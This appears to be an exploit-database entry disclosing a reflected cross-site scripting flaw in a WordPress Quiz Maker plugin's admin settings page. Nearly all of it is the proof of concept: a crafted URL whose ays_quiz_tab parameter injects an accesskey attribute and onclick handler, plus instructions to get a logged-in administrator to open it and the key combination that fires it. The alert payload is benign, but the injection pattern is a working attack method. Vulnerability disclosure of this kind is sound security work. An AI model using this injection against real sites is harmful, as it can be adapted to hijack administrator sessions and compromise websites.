## https://sploitus.com/exploit?id=WPEX-ID:2DC02E5C-1C89-4053-A6A7-29EE7B996183
Make a logged in admin open the URL below (other URL are also affected)
https://example.com/wp-admin/admin.php?page=quiz-maker-settings&ays_quiz_tab=" accesskey=X onclick=alert(/XSS/)//
The XSS will be triggered when pressing ALT+SHIFT+X on Windows and CTRL+ALT+X on OS X